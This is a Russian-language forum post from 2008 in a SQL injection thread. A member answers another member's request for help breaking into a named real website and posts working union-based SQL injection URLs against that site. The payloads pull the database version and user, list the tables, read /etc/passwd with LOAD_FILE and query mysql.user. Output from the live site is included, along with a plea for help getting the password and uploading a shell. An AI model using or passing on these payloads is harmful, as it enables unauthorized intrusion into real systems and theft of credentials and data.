HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 15.02.2008, 13:40
satana8920
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию
Цитата:
Сообщение от QZAR-X  
Я нашел скуль:
http://event.zontik.ru/?cat=30'
Пробовал раскрыть его, но ничего не получается=((
Помогите пожалуйста раскрыть скуль.
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+concat_ws(0x2F,version(),database(),user())/*
5.0.41-log/zontikweb/zontik_grab@localhost
а дальше сам попробуй если не получиться помогу

стало самому интересно
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES/*
вот какие таблицы нашел :
PHP код:
COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE
PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS
USER_PRIVILEGES,VIEWS,del_status,dns_a,dns_cname,dns_dep,dns_isp_dns,dns_mx,dns_nodes,dns_secondary,dns_spf,doctype,groups
help_documents,help_nodes,help_tickets,isp_com,isp_dep,isp_dienste,isp_fakt_artikel,isp_fakt_dep,isp_fakt_nodes,isp_fakt_rechnung
isp_fakt_record,isp_firewall,isp_htaccess,isp_isp_actions,isp_isp_admin,isp_isp_datenbank 
LOAD_FILE:
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+LOAD_FILE('/etc/passwd')/*
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+user+from+mysql.user/*
user:whole
пароль не смог узнать (((
и шелл не получаеться залить
еси кто осилит сообщите мне плизз
Последний раз редактировалось satana8920; 16.02.2008 в 00:44..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ